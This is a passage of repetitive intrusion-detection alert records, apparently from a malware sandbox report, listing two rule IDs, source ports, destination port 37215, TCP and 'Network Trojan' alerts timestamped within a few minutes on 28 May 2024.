            SID:2835222
            Source Port:43438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086503
            SID:2829579
            Source Port:38952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941654
            SID:2829579
            Source Port:58694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713441
            SID:2829579
            Source Port:37442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709926
            SID:2835222
            Source Port:41356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775529
            SID:2835222
            Source Port:37576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533505
            SID:2829579
            Source Port:47146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559713
            SID:2829579
            Source Port:60682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.913997
            SID:2829579
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557361
            SID:2829579
            Source Port:40742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869930
            SID:2835222
            Source Port:42176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843215
            SID:2835222
            Source Port:35828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052595
            SID:2835222
            Source Port:38386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563515
            SID:2835222
            Source Port:59394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.311520
            SID:2829579
            Source Port:59576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.051821
            SID:2829579
            Source Port:35956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059799
            SID:2829579
            Source Port:56426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.113396
            SID:2829579
            Source Port:36402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810752
            SID:2829579
            Source Port:57960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.346401
            SID:2829579
            Source Port:37424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832715
            SID:2829579
            Source Port:46916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565081
            SID:2835222
            Source Port:54304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470727
            SID:2829579
            Source Port:60832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972818
            SID:2829579
            Source Port:43502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280307
            SID:2835222
            Source Port:33744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.005946
            SID:2835222
            Source Port:55446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842907
            SID:2835222
            Source Port:36456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299425
            SID:2835222
            Source Port:55780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852743
            SID:2829579
            Source Port:46110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.062041
            SID:2829579
            Source Port:46044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432208
            SID:2835222
            Source Port:46596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261451
            SID:2835222
            Source Port:54838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946297
            SID:2835222
            Source Port:54716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453888
            SID:2835222
            Source Port:43992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854105
            SID:2829579
            Source Port:54626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.062196
            SID:2835222
            Source Port:37222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979478
            SID:2835222
            Source Port:37984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024660
            SID:2829579
            Source Port:48240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843262
            SID:2829579
            Source Port:42486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920043
            SID:2835222
            Source Port:43072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953528
            SID:2835222
            Source Port:44392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.307698
            SID:2829579
            Source Port:58854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.346310
            SID:2835222
            Source Port:35778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919383
            SID:2835222
            Source Port:41822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996411
            SID:2835222
            Source Port:37472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568653
            SID:2835222
            Source Port:39130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721006
            SID:2835222
            Source Port:38930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936157
            SID:2835222
            Source Port:45808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332251
            SID:2829579
            Source Port:41454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812141
            SID:2829579
            Source Port:53346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231071
            SID:2829579
            Source Port:44102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312696
            SID:2835222
            Source Port:47134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852992
            SID:2835222
            Source Port:37630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.544428
            SID:2835222
            Source Port:53484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737023
            SID:2835222
            Source Port:45338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334521
            SID:2835222
            Source Port:41482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821631
            SID:2835222
            Source Port:39320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604504
            SID:2829579
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996194
            SID:2829579
            Source Port:59900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563369
            SID:2835222
            Source Port:39446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.738095
            SID:2829579
            Source Port:35576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871692
            SID:2829579
            Source Port:39858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811091
            SID:2829579
            Source Port:59288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.309544
            SID:2835222
            Source Port:45742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.063563
            SID:2829579
            Source Port:52520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078505
            SID:2829579
            Source Port:38016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547503
            SID:2835222
            Source Port:60544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870687
            SID:2829579
            Source Port:47104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.158751
            SID:2835222
            Source Port:38476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941660
            SID:2835222
            Source Port:43886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071799
            SID:2835222
            Source Port:41242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321232
            SID:2835222
            Source Port:35416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543392
            SID:2829579
            Source Port:45130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533471
            SID:2829579
            Source Port:55122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743894
            SID:2829579
            Source Port:48076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.160303
            SID:2829579
            Source Port:46404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.117299
            SID:2835222
            Source Port:57476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851010
            SID:2835222
            Source Port:52562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000254
            SID:2835222
            Source Port:57160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934046
            SID:2835222
            Source Port:48326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.842584
            SID:2829579
            Source Port:38030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759436
            SID:2835222
            Source Port:33936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864564
            SID:2829579
            Source Port:54548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956869
            SID:2829579
            Source Port:57182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377701
            SID:2835222
            Source Port:55550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.366953
            SID:2829579
            Source Port:57236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582594
            SID:2835222
            Source Port:57354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741565
            SID:2829579
            Source Port:48758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994308
            SID:2835222
            Source Port:58442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730209
            SID:2835222
            Source Port:35410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943419
            SID:2829579
            Source Port:58954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019100
            SID:2835222
            Source Port:35422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.557703
            SID:2835222
            Source Port:43500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895582
            SID:2829579
            Source Port:49834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.047891
            SID:2829579
            Source Port:55092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691640
            SID:2829579
            Source Port:47866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299337
            SID:2835222
            Source Port:37270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.350567
            SID:2835222
            Source Port:38808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.262947
            SID:2829579
            Source Port:59876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790107
            SID:2835222
            Source Port:45284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559450
            SID:2829579
            Source Port:49412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851013
            SID:2829579
            Source Port:40836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030797
            SID:2829579
            Source Port:43014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841087
            SID:2829579
            Source Port:56550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748719
            SID:2835222
            Source Port:39650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.025449
            SID:2829579
            Source Port:45560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851224
            SID:2829579
            Source Port:57234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756606
            SID:2829579
            Source Port:50548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309882
            SID:2835222
            Source Port:52708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582731
            SID:2829579
            Source Port:52970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560713
            SID:2829579
            Source Port:51628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936273
            SID:2829579
            Source Port:53820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471283
            SID:2835222
            Source Port:33410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814907
            SID:2835222
            Source Port:48992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596339
            SID:2829579
            Source Port:47542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525919
            SID:2829579
            Source Port:42146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998296
            SID:2835222
            Source Port:42958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.607278
            SID:2829579
            Source Port:54782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952010
            SID:2829579
            Source Port:39482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818360
            SID:2829579
            Source Port:47306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865489
            SID:2829579
            Source Port:36396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499793
            SID:2835222
            Source Port:42146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861452
            SID:2829579
            Source Port:39068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.938315
            SID:2829579
            Source Port:56854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358212
            SID:2835222
            Source Port:57966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.550095
            SID:2835222
            Source Port:49358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574425
            SID:2829579
            Source Port:34874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863882
            SID:2835222
            Source Port:59928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.376921
            SID:2829579
            Source Port:53508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334310
            SID:2829579
            Source Port:34856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862932
            SID:2835222
            Source Port:41610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639570
            SID:2829579
            Source Port:35882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433644
            SID:2829579
            Source Port:54966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.830554
            SID:2835222
            Source Port:34640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931930
            SID:2829579
            Source Port:37418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.915966
            SID:2835222
            Source Port:58852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734836
            SID:2829579
            Source Port:40794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770672
            SID:2829579
            Source Port:53752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995863
            SID:2835222
            Source Port:50248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423686
            SID:2835222
            Source Port:36608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398495
            SID:2829579
            Source Port:41910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754636
            SID:2829579
            Source Port:47286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841184
            SID:2829579
            Source Port:43056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773856
            SID:2835222
            Source Port:47002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676497
            SID:2829579
            Source Port:34176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.988998
            SID:2835222
            Source Port:55156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471331
            SID:2835222
            Source Port:55244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045943
            SID:2829579
            Source Port:57818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436999
            SID:2829579
            Source Port:33752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068979
            SID:2835222
            Source Port:41136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849593
            SID:2835222
            Source Port:38292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927198
            SID:2835222
            Source Port:54396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459675
            SID:2829579
            Source Port:56834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773982
            SID:2835222
            Source Port:58674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993899
            SID:2835222
            Source Port:44328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.060178
            SID:2829579
            Source Port:55248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.925068
            SID:2829579
            Source Port:60880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261482
            SID:2829579
            Source Port:51638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861995
            SID:2829579
            Source Port:34332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019032
            SID:2835222
            Source Port:33816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916744
            SID:2835222
            Source Port:39022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851163
            SID:2835222
            Source Port:57666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668999
            SID:2835222
            Source Port:52544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525941
            SID:2835222
            Source Port:34286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912076
            SID:2829579
            Source Port:54904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459779
            SID:2829579
            Source Port:50676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059831
            SID:2835222
            Source Port:59250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048152
            SID:2829579
            Source Port:58002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646717
            SID:2829579
            Source Port:49648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.153204
            SID:2829579
            Source Port:59564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925478
            SID:2829579
            Source Port:53814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.905111
            SID:2829579
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946734
            SID:2835222
            Source Port:33634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055128
            SID:2829579
            Source Port:51644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948324
            SID:2835222
            Source Port:47000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808072
            SID:2829579
            Source Port:50352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470342
            SID:2835222
            Source Port:35758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776423
            SID:2835222
            Source Port:32952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841448
            SID:2835222
            Source Port:33618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604690
            SID:2829579
            Source Port:48868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610949
            SID:2835222
            Source Port:60460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753250
            SID:2835222
            Source Port:59738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922712
            SID:2835222
            Source Port:55544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827379
            SID:2835222
            Source Port:56368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052884
            SID:2829579
            Source Port:42612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443117
            SID:2829579
            Source Port:37076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767663
            SID:2835222
            Source Port:40890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052796
            SID:2835222
            Source Port:53454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543510
            SID:2829579
            Source Port:37496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077911
            SID:2835222
            Source Port:60858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771701
            SID:2829579
            Source Port:38638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778495
            SID:2829579
            Source Port:45130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807254
            SID:2835222
            Source Port:60112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818204
            SID:2829579
            Source Port:44892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756839
            SID:2835222
            Source Port:53588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852821
            SID:2829579
            Source Port:59138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506736
            SID:2835222
            Source Port:44842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.065868
            SID:2829579
            Source Port:53268
            Destination Port:37215
